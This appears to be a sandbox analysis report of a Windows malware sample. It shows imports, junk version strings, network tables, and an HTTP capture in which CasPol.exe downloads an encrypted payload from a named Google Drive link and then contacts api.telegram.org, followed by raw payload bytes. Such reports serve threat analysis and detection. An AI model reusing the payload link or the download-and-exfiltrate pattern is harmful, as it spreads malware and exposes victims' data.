                                            KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                                            DescriptionData
                                            LegalCopyrightMarkedsana
                                            FileVersion24.8.29
                                            CompanyNamevugvalidatin
                                            LegalTrademarksMETACINNAB
                                            CommentsSpiroloculin113
                                            ProductNameLeuk
                                            FileDescriptionJanfridelefrek82
                                            Translation0x0409 0x04b0
                                            Language of compilation systemCountry where language is spokenMap
                                            EnglishUnited States
                                            TimestampSource PortDest PortSource IPDest IP
                                            May 11, 2022 13:28:16.660628080 CEST49770443192.168.11.20216.58.212.142
                                            May 11, 2022 13:28:16.660676956 CEST44349770216.58.212.142192.168.11.20
                                            May 11, 2022 13:28:16.660924911 CEST49770443192.168.11.20216.58.212.142
                                            May 11, 2022 13:28:16.683361053 CEST49770443192.168.11.20216.58.212.142
                                            May 11, 2022 13:28:16.683378935 CEST44349770216.58.212.142192.168.11.20
                                            May 11, 2022 13:28:16.717430115 CEST44349770216.58.212.142192.168.11.20
                                            May 11, 2022 13:28:16.717649937 CEST49770443192.168.11.20216.58.212.142
                                            May 11, 2022 13:28:16.717777014 CEST49770443192.168.11.20216.58.212.142
                                            May 11, 2022 13:28:16.718367100 CEST44349770216.58.212.142192.168.11.20
                                            May 11, 2022 13:28:16.718611002 CEST49770443192.168.11.20216.58.212.142
                                            May 11, 2022 13:28:16.828865051 CEST49770443192.168.11.20216.58.212.142
                                            May 11, 2022 13:28:16.829538107 CEST44349770216.58.212.142192.168.11.20
                                            May 11, 2022 13:28:16.829838991 CEST49770443192.168.11.20216.58.212.142
                                            May 11, 2022 13:28:16.840583086 CEST49770443192.168.11.20216.58.212.142
                                            May 11, 2022 13:28:16.882555008 CEST44349770216.58.212.142192.168.11.20
                                            May 11, 2022 13:28:17.572989941 CEST44349770216.58.212.142192.168.11.20
                                            May 11, 2022 13:28:17.573271990 CEST49770443192.168.11.20216.58.212.142
                                            May 11, 2022 13:28:17.573339939 CEST44349770216.58.212.142192.168.11.20
                                            May 11, 2022 13:28:17.573519945 CEST49770443192.168.11.20216.58.212.142
                                            May 11, 2022 13:28:17.573566914 CEST44349770216.58.212.142192.168.11.20
                                            May 11, 2022 13:28:17.573647976 CEST44349770216.58.212.142192.168.11.20
                                            May 11, 2022 13:28:17.573672056 CEST49770443192.168.11.20216.58.212.142
                                            May 11, 2022 13:28:17.573720932 CEST44349770216.58.212.142192.168.11.20
                                            May 11, 2022 13:28:17.573729992 CEST49770443192.168.11.20216.58.212.142
                                            May 11, 2022 13:28:17.573833942 CEST49770443192.168.11.20216.58.212.142
                                            May 11, 2022 13:28:17.573878050 CEST49770443192.168.11.20216.58.212.142
                                            May 11, 2022 13:28:17.717449903 CEST49771443192.168.11.20172.217.18.97
                                            May 11, 2022 13:28:17.717479944 CEST44349771172.217.18.97192.168.11.20
                                            May 11, 2022 13:28:17.717689037 CEST49771443192.168.11.20172.217.18.97
                                            May 11, 2022 13:28:17.718205929 CEST49771443192.168.11.20172.217.18.97
                                            May 11, 2022 13:28:17.718224049 CEST44349771172.217.18.97192.168.11.20
                                            May 11, 2022 13:28:17.752542973 CEST44349771172.217.18.97192.168.11.20
                                            May 11, 2022 13:28:17.752731085 CEST49771443192.168.11.20172.217.18.97
                                            May 11, 2022 13:28:17.753555059 CEST44349771172.217.18.97192.168.11.20
                                            May 11, 2022 13:28:17.753747940 CEST49771443192.168.11.20172.217.18.97
                                            May 11, 2022 13:28:17.757205963 CEST49771443192.168.11.20172.217.18.97
                                            May 11, 2022 13:28:17.757448912 CEST44349771172.217.18.97192.168.11.20
                                            May 11, 2022 13:28:17.757680893 CEST49771443192.168.11.20172.217.18.97
                                            May 11, 2022 13:28:17.758027077 CEST49771443192.168.11.20172.217.18.97
                                            May 11, 2022 13:28:17.798537970 CEST44349771172.217.18.97192.168.11.20
                                            May 11, 2022 13:28:17.995814085 CEST44349771172.217.18.97192.168.11.20
                                            May 11, 2022 13:28:17.996098042 CEST49771443192.168.11.20172.217.18.97
                                            May 11, 2022 13:28:17.996407032 CEST44349771172.217.18.97192.168.11.20
                                            May 11, 2022 13:28:17.996613026 CEST49771443192.168.11.20172.217.18.97
                                            May 11, 2022 13:28:17.997014999 CEST44349771172.217.18.97192.168.11.20
                                            May 11, 2022 13:28:17.997282028 CEST49771443192.168.11.20172.217.18.97
                                            May 11, 2022 13:28:17.998353958 CEST44349771172.217.18.97192.168.11.20
                                            May 11, 2022 13:28:17.998662949 CEST49771443192.168.11.20172.217.18.97
                                            May 11, 2022 13:28:17.998713970 CEST44349771172.217.18.97192.168.11.20
                                            May 11, 2022 13:28:17.998923063 CEST49771443192.168.11.20172.217.18.97
                                            May 11, 2022 13:28:18.000739098 CEST44349771172.217.18.97192.168.11.20
                                            May 11, 2022 13:28:18.000973940 CEST49771443192.168.11.20172.217.18.97
                                            May 11, 2022 13:28:18.004015923 CEST44349771172.217.18.97192.168.11.20
                                            May 11, 2022 13:28:18.004214048 CEST49771443192.168.11.20172.217.18.97
                                            May 11, 2022 13:28:18.004267931 CEST44349771172.217.18.97192.168.11.20
                                            May 11, 2022 13:28:18.004458904 CEST49771443192.168.11.20172.217.18.97
                                            May 11, 2022 13:28:18.004481077 CEST44349771172.217.18.97192.168.11.20
                                            May 11, 2022 13:28:18.004503012 CEST44349771172.217.18.97192.168.11.20
                                            May 11, 2022 13:28:18.004712105 CEST49771443192.168.11.20172.217.18.97
                                            May 11, 2022 13:28:18.004770041 CEST44349771172.217.18.97192.168.11.20
                                            May 11, 2022 13:28:18.005000114 CEST49771443192.168.11.20172.217.18.97
                                            May 11, 2022 13:28:18.005332947 CEST44349771172.217.18.97192.168.11.20
                                            May 11, 2022 13:28:18.005578041 CEST49771443192.168.11.20172.217.18.97
                                            May 11, 2022 13:28:18.005630970 CEST44349771172.217.18.97192.168.11.20
                                            May 11, 2022 13:28:18.005790949 CEST49771443192.168.11.20172.217.18.97
                                            May 11, 2022 13:28:18.005966902 CEST44349771172.217.18.97192.168.11.20
                                            May 11, 2022 13:28:18.006284952 CEST49771443192.168.11.20172.217.18.97
                                            May 11, 2022 13:28:18.006337881 CEST44349771172.217.18.97192.168.11.20
                                            May 11, 2022 13:28:18.006505966 CEST49771443192.168.11.20172.217.18.97
                                            May 11, 2022 13:28:18.006762028 CEST44349771172.217.18.97192.168.11.20
                                            May 11, 2022 13:28:18.007016897 CEST49771443192.168.11.20172.217.18.97
                                            May 11, 2022 13:28:18.007072926 CEST44349771172.217.18.97192.168.11.20
                                            May 11, 2022 13:28:18.007247925 CEST49771443192.168.11.20172.217.18.97
                                            May 11, 2022 13:28:18.007345915 CEST44349771172.217.18.97192.168.11.20
                                            May 11, 2022 13:28:18.007601023 CEST49771443192.168.11.20172.217.18.97
                                            May 11, 2022 13:28:18.007647038 CEST44349771172.217.18.97192.168.11.20
                                            May 11, 2022 13:28:18.007803917 CEST49771443192.168.11.20172.217.18.97
                                            May 11, 2022 13:28:18.007936001 CEST44349771172.217.18.97192.168.11.20
                                            May 11, 2022 13:28:18.008086920 CEST49771443192.168.11.20172.217.18.97
                                            May 11, 2022 13:28:18.008119106 CEST44349771172.217.18.97192.168.11.20
                                            May 11, 2022 13:28:18.008313894 CEST49771443192.168.11.20172.217.18.97
                                            May 11, 2022 13:28:18.008554935 CEST44349771172.217.18.97192.168.11.20
                                            May 11, 2022 13:28:18.008708954 CEST49771443192.168.11.20172.217.18.97
                                            May 11, 2022 13:28:18.008749962 CEST44349771172.217.18.97192.168.11.20
                                            May 11, 2022 13:28:18.008905888 CEST49771443192.168.11.20172.217.18.97
                                            May 11, 2022 13:28:18.008943081 CEST44349771172.217.18.97192.168.11.20
                                            May 11, 2022 13:28:18.009129047 CEST49771443192.168.11.20172.217.18.97
                                            May 11, 2022 13:28:18.009393930 CEST44349771172.217.18.97192.168.11.20
                                            May 11, 2022 13:28:18.009543896 CEST49771443192.168.11.20172.217.18.97
                                            May 11, 2022 13:28:18.009582043 CEST44349771172.217.18.97192.168.11.20
                                            May 11, 2022 13:28:18.009797096 CEST49771443192.168.11.20172.217.18.97
                                            May 11, 2022 13:28:18.009841919 CEST44349771172.217.18.97192.168.11.20
                                            May 11, 2022 13:28:18.010034084 CEST49771443192.168.11.20172.217.18.97
                                            May 11, 2022 13:28:18.010267973 CEST44349771172.217.18.97192.168.11.20
                                            May 11, 2022 13:28:18.010417938 CEST49771443192.168.11.20172.217.18.97
                                            May 11, 2022 13:28:18.010451078 CEST44349771172.217.18.97192.168.11.20
                                            May 11, 2022 13:28:18.010643005 CEST49771443192.168.11.20172.217.18.97
                                            May 11, 2022 13:28:18.010688066 CEST44349771172.217.18.97192.168.11.20
                                            May 11, 2022 13:28:18.010883093 CEST49771443192.168.11.20172.217.18.97
                                            May 11, 2022 13:28:18.011149883 CEST44349771172.217.18.97192.168.11.20
                                            TimestampSource PortDest PortSource IPDest IP
                                            May 11, 2022 13:28:16.642456055 CEST5964053192.168.11.201.1.1.1
                                            May 11, 2022 13:28:16.651192904 CEST53596401.1.1.1192.168.11.20
                                            May 11, 2022 13:28:17.677428961 CEST5307153192.168.11.201.1.1.1
                                            May 11, 2022 13:28:17.715678930 CEST53530711.1.1.1192.168.11.20
                                            May 11, 2022 13:28:31.361742020 CEST6501253192.168.11.201.1.1.1
                                            May 11, 2022 13:28:31.370393038 CEST53650121.1.1.1192.168.11.20
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            May 11, 2022 13:28:16.642456055 CEST192.168.11.201.1.1.10xb592Standard query (0)drive.google.comA (IP address)IN (0x0001)
                                            May 11, 2022 13:28:17.677428961 CEST192.168.11.201.1.1.10x60c4Standard query (0)doc-04-1o-docs.googleusercontent.comA (IP address)IN (0x0001)
                                            May 11, 2022 13:28:31.361742020 CEST192.168.11.201.1.1.10x9ce8Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            May 11, 2022 13:28:16.651192904 CEST1.1.1.1192.168.11.200xb592No error (0)drive.google.com216.58.212.142A (IP address)IN (0x0001)
                                            May 11, 2022 13:28:17.715678930 CEST1.1.1.1192.168.11.200x60c4No error (0)doc-04-1o-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                            May 11, 2022 13:28:17.715678930 CEST1.1.1.1192.168.11.200x60c4No error (0)googlehosted.l.googleusercontent.com172.217.18.97A (IP address)IN (0x0001)
                                            May 11, 2022 13:28:31.370393038 CEST1.1.1.1192.168.11.200x9ce8No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                            • drive.google.com
                                            • doc-04-1o-docs.googleusercontent.com
                                            • api.telegram.org
                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.11.2049770216.58.212.142443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                            TimestampkBytes transferredDirectionData
                                            2022-05-11 11:28:16 UTC0OUTGET /uc?export=download&id=1hBPij_FbvgapJ-GfS2ATEfZikBmSe_Fv HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                            Host: drive.google.com
                                            Cache-Control: no-cache
                                            2022-05-11 11:28:17 UTC0INHTTP/1.1 303 See Other
                                            Content-Type: application/binary
                                            Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                            Pragma: no-cache
                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                            Date: Wed, 11 May 2022 11:28:17 GMT
                                            Location: https://doc-04-1o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v0f0106r562t78j67kq2fi8o6al2mrn8/1652268450000/12299294031038466182/*/1hBPij_FbvgapJ-GfS2ATEfZikBmSe_Fv?e=download
                                            Strict-Transport-Security: max-age=31536000
                                            Content-Security-Policy: script-src 'nonce-XmZca1MryCvvuiYHnXXZZg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                            Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                            Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                            Server: ESF
                                            Content-Length: 0
                                            X-XSS-Protection: 0
                                            X-Frame-Options: SAMEORIGIN
                                            X-Content-Type-Options: nosniff
                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                            Connection: close


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            1192.168.11.2049771172.217.18.97443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                            TimestampkBytes transferredDirectionData
                                            2022-05-11 11:28:17 UTC1OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v0f0106r562t78j67kq2fi8o6al2mrn8/1652268450000/12299294031038466182/*/1hBPij_FbvgapJ-GfS2ATEfZikBmSe_Fv?e=download HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                            Cache-Control: no-cache
                                            Host: doc-04-1o-docs.googleusercontent.com
                                            Connection: Keep-Alive
                                            2022-05-11 11:28:17 UTC2INHTTP/1.1 200 OK
                                            X-GUploader-UploadID: ADPycdurdOpvIH00BeJadl-W9KiCH8qVzkvEKayJekDSWaYSBPaf1Gk0bgA1skqNFF5WbNAT1F85PkzEV-l5dffgLVI17Q
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Credentials: false
                                            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment
                                            Access-Control-Allow-Methods: GET,OPTIONS
                                            Content-Type: application/octet-stream
                                            Content-Disposition: attachment;filename="golden_qaRztFW34.bin";filename*=UTF-8''golden_qaRztFW34.bin
                                            Content-Length: 215104
                                            Date: Wed, 11 May 2022 11:28:17 GMT
                                            Expires: Wed, 11 May 2022 11:28:17 GMT
                                            Cache-Control: private, max-age=0
                                            X-Goog-Hash: crc32c=MfkfOw==
                                            Server: UploadServer
                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                            Connection: close
                                            2022-05-11 11:28:17 UTC5INData Raw: 25 e9 6e ee b3 d9 b5 a2 6b 62 14 3f 24 38 eb d2 5a 45 8a b4 f1 98 cf 28 22 ac ec 5d 1d 09 0c f6 38 48 33 22 e8 de 1b 22 e4 ad 5c 8d a5 ef 8d 93 01 c0 a9 bd 01 cb 93 f1 87 b8 18 49 78 13 a1 d9 df 17 3e 10 44 11 c6 29 25 2a e9 50 0a f8 96 d9 41 80 65 82 24 dd 5c 62 a1 92 19 a9 d8 c1 f2 56 7d b1 f2 28 57 67 ec f1 bf 18 f8 25 17 ef 1d 91 fd 12 06 b2 b0 9a 30 e7 86 76 bf c5 be bf e6 79 1e 78 a3 7a 76 83 cc f5 92 1a 12 09 b4 8c d9 e4 8b b1 06 83 99 37 8e 16 26 73 48 96 2a cd 3a 57 aa f3 3b a2 ac b4 23 62 77 11 25 ae 35 86 75 2e c7 18 04 e5 9f 6f dd 3f ac 3f de b8 4c 5a 36 14 13 fc f5 21 7b d9 8f f2 31 9b b9 ca 4b 3e 2d 65 80 ca d2 80 ec f6 ef 8d 9d 4f 61 53 79 69 4b f0 7d a2 95 0f 25 89 9b 59 aa fe 5c 25 72 c5 e2 3b ee df 3a f0 06 e5 15 a4 e3 94 8a 17 93 94 88
                                            Data Ascii: %nkb?$8ZE("]8H3""\Ix>D)%*PAe$\bV}(Wg%0vyxzv7&sH*:W;#bw%5u.o??LZ6!{1K>-eOaSyiK}%Y\%r;:
                                            2022-05-11 11:28:17 UTC9INData Raw: e5 5f 84 87 4b b1 7a 98 7c 9a 0c 64 96 20 06 42 e9 bd 57 99 b2 73 5f 12 b2 ac 6a 99 d2 25 fa 89 26 73 27 f7 d6 7c 4b 9b 53 f3 ed 36 a6 f3 3c 3e 83 d7 8d bd 6c 87 84 b3 d7 39 70 d7 4c 1c bc 1e a2 49 c2 32 de 06 94 bf d6 85 7d 47 b4 95 92 6b a1 66 2d 51 a0 70 08 57 95 dc 87 b5 f7 1a a8 62 8d 88 3c 0b 18 25 ce 72 9e c2 aa a2 98 e5 30 59 12 33 a4 aa e3 53 e2 d7 38 7d 05 34 c8 15 73 ac 8d 54 3b e7 ae dc ee f0 7a d9 a4 e8 44 d5 90 27 b4 a8 ff eb 6e c2 04 43 3a 05 26 59 b8 40 d9 f4 a9 48 b0 5c 04 be bb 39 1a ee 6b 2c d0 77 b2 bd 5a 56 3c 7f 5c c3 26 8d 3b fc 9c 84 bb fe 52 46 b0 7d 7d 49 e7 91 43 b9 12 ef 02 cc a1 1b 28 8a c4 36 dd 54 bd 61 5f 80 4b 95 60 a0 88 eb bb 68 1b c9 ef ae 61 1e ce 07 a9 46 9d df d4 87 5c d6 d3 a0 aa 38 bc ad 16 f5 0e 9e 6c 14 e3 46 ed
                                            Data Ascii: _Kz|d BWs_j%&s'|KS6<>l9pLI2}Gkf-QpWb<%r0Y3S8}4sT;zD'nC:&Y@H\9k,wZV<\&;RF}}IC(6Ta_K`haF\8lF
                                            2022-05-11 11:28:17 UTC13INData Raw: 4a fb 4c e6 1e 68 ff 58 b0 46 2b f6 73 5b c7 8a ee f4 0c 57 72 63 ad 71 c9 2c 04 82 d4 60 80 bb 4a 71 37 88 39 d8 90 ee 58 36 12 6b 9f f5 21 3d b7 de f2 92 da ca aa 63 59 2d 65 8a be ee 80 0c f7 fe 84 87 46 42 f0 7b 57 4e f6 55 89 95 0f 2f e6 ea 59 54 a8 4e 2d 5a 6f e0 3b e8 b0 4a f0 06 ef 44 ac f4 db e1 17 93 9c 99 bc 18 52 3b 2e aa 97 c4 0d db 26 32 60 2b 88 65 3f e5 cf 01 f2 fc 52 96 e8 7f 98 db 51 cb 72 e5 7a d8 7c a5 6e af 3e 22 f2 54 5c 3e 3e 42 a3 dc f9 0c 08 3e 0a 30 63 cf 60 d1 ef 22 8c 14 cd 13 31 a2 75 2f 66 7f ca cc f3 cc f8 4d ae 1c da f5 72 15 0c d3 79 cf 26 32 3b 5b 86 80 9f c1 8c 2e c3 84 77 bc 46 80 1e af cb 2f a5 61 da d1 71 59 f7 09 17 01 6a 8a 5f 65 eb 9e 62 8f a3 14 3c d0 9b 6f a7 df 97 84 2f 6e e3 73 be ee 7f a9 99 b3 70 9e 47 aa 99
                                            Data Ascii: JLhXF+s[Wrcq,`Jq79X6k!=cY-eFB{WNU/YTN-Zo;JDR;.&2`+e?RQrz|n>"T\>>B>0c`"1u/fMry&2;[.wF/aqYj_eb<o/nspG
                                            2022-05-11 11:28:17 UTC17INData Raw: dc a1 ba 3a 05 2d 78 83 51 b3 c1 6f 4a b4 f8 1a 24 94 4c 18 ef 79 9a cc 47 02 f6 5a 5c 22 5c 87 c0 58 91 2c 71 9f ac f7 ff 41 48 03 71 72 62 33 82 47 ab a4 f1 0f 9a 21 1b 28 84 61 2a ee 90 1d 69 45 e8 db 92 60 a4 2b f7 87 31 33 51 e5 86 38 0a e6 c7 83 68 9b c8 53 5e 5c fc 93 af ae 29 b8 bb 00 79 4c 9e 6c 15 2e 55 e9 0e 84 db 23 69 90 e1 8d 3a 8a da c5 5d f8 4d 2a 5c e3 ee 44 28 a5 c9 aa 3d a6 01 61 4a c5 35 d4 c5 cd 69 a9 cf 3b fe de f6 25 c3 cd 68 bb f2 fd f9 ad 1a e6 d8 a1 f4 a8 57 bc dd 31 ef 92 13 8c 18 ef 0f 7e ea f2 43 5d cc ce c9 40 f3 a0 e7 fb fe ab cf 88 50 93 4c 60 3e a0 60 17 d2 2b f9 ca 91 b8 cd 51 31 bc ce 4a 7a 9d 7a 54 73 fc 34 26 c4 64 ae e7 f2 4a e1 a7 6f 0f 61 cc ca d6 b5 dd 22 70 89 91 35 75 2d 07 ed 22 33 3a 67 18 aa c0 60 82 04 fa ba
                                            Data Ascii: :-xQoJ$LyGZ\"\X,qAHqrb3G!(a*iE`+13Q8hS^\)yLl.U#i:]M*\D(=aJ5i;%hW1~C]@PL`>`+Q1JzzTs4&dJoa"p5u-"3:g`
                                            2022-05-11 11:28:17 UTC18INData Raw: 09 ec 31 03 c7 85 91 fd 18 12 9a 50 98 30 e1 91 fb b8 c5 3e be f5 6b 01 75 0f 5c a9 35 c5 3e 11 b3 01 51 6d b9 a5 14 e2 c2 2c db fa 58 e9 6e 54 12 7e e6 40 b2 58 2c f6 0e 5b c7 8a de db 0b 57 78 4a 9d 63 d8 34 18 82 a8 62 80 b7 c0 c1 27 9f 17 24 b9 4c 5c 94 05 51 ad e1 35 1f 40 8c f2 98 f8 66 a8 4b 34 3f 6e a8 25 d2 80 06 da f0 9d 9d 5f 6e 62 6e 46 43 e3 79 bb 99 27 7a 8b 9b 5f 7c 0c 5f 25 78 cd 45 3b ee d5 29 f5 17 f5 3a 0e e3 b4 80 2d 79 68 77 4b ee 2d 2a 3e d5 c1 ae 0d da 00 2f 79 54 8e 5c 3f ef dd 68 87 58 50 9c 32 00 72 de 3e 65 61 e8 58 4d d8 a5 68 a8 3c 3b d1 0c 48 02 72 e4 a3 d6 9c cc af 3e 00 37 ae cf 60 da c4 33 9a 97 15 21 45 a2 7f f9 7f 69 d0 b1 11 dd f4 28 15 14 cb f9 53 d3 e5 d3 73 d6 43 f0 6a 5b 8c 99 9d e0 98 6d d0 eb db af 4d 9b 6c c5 c0
                                            Data Ascii: 1P0>ku\5>Qm,XnT~@X,[WxJc4b'$L\Q5@fK4?n%_nbnFCy'z_|_%xE;):-yhwK-*>/yT\?hXP2r>eaXMh<;Hr>7`3!Ei(SsCj[mMl
                                            2022-05-11 11:28:17 UTC19INData Raw: cb 84 8f 82 31 08 11 1c a0 58 b8 c4 82 e4 b2 e5 3a 71 23 2d a4 ac c9 1d e2 d7 8b 55 76 36 c1 11 5b 87 4f 56 3d cf cb de ee f6 52 f1 a4 e8 51 3b f3 0f d9 a8 ff e1 60 df 89 4a 2c 0e 0c 4e b0 51 b0 17 a8 64 b6 e6 07 a9 94 5a e6 ef 41 8c cf 64 9a f1 42 a8 37 58 4c e9 5a bc d8 ff 8e af 79 49 7a b6 12 75 6e 49 d8 91 43 b9 ce d5 18 b2 b6 74 62 8e 66 34 a9 85 1f 69 49 d4 20 e6 29 a4 2a e5 bb 65 1b c9 e3 92 b2 2e ce 0d 85 7c 1d ee de 59 58 e8 12 8e aa 38 b8 87 16 f5 0d ae 6e 14 ab 44 ed 1a bb cd 34 50 1b ea a6 2b 8d c9 fa 65 fb 61 2e 52 65 e9 43 3e 5a dc 92 2b 99 92 61 4d d7 df fd 22 cd 42 ad f3 55 87 f2 f6 24 d4 e3 79 ac d4 e8 75 74 1a e6 d9 2f e5 ac 52 be c0 1e b9 0f 13 8c 12 ef 00 a8 2d dc 4b 59 5a 6f ce 40 f7 bd f8 ef ed 9b a9 89 7c 96 4c b6 f4 e5 60 11 c3 d5
                                            Data Ascii: 1X:q#-Uv6[OV=RQ;`J,NQdZAdB7XLZyIzunICtbf4iI )*e.|YX8nD4P+ea.ReC>Z+aM"BU$yut/R-KYZo@|L`
                                            2022-05-11 11:28:17 UTC20INData Raw: 55 8e 54 22 68 cd 1c 3a ee d9 98 ef 0d e9 55 ac f4 4a 8b 3b 91 8e 84 b4 38 2d c5 2f 8c fa b9 01 db 24 3c 79 ba fa 49 3d c4 d9 3f ac a6 af 69 c4 73 96 cd 0e 6c 72 9f 70 b7 d9 94 6e a5 3c 20 d4 25 2a 2a 51 e4 a3 d5 eb da ae 12 04 2c 0e e4 71 d7 ec ba 3c 8d a0 70 4e bb 78 25 67 74 38 c3 da c7 8a 0f 06 1c de 90 5f bd 0c d9 0d fb 2c 1a 6e 5c 1c e5 4f cb e3 76 ef b1 66 a2 4d 98 03 40 c1 15 b0 7d 7e 7a 13 2d fe 10 e3 11 52 e1 de 46 f1 99 4f 28 6a fc 2c e8 ec 4e aa df 9f be dd 7e db 04 90 e3 7f a1 ea 10 71 b2 4f 5d 8a b0 75 59 65 ab 00 0c 5c 8d 94 a0 96 c4 27 95 de 05 13 b7 b9 74 a9 4c cb 20 88 21 5d 5c a8 39 d1 87 43 e5 c6 79 49 ed 55 39 a1 fc d9 28 28 f3 68 22 b1 12 66 e0 9a 35 92 08 cf 62 86 d2 22 6f c2 d7 e9 f0 30 00 fe e7 94 44 6b 70 7f 72 98 74 97 da 15 0b
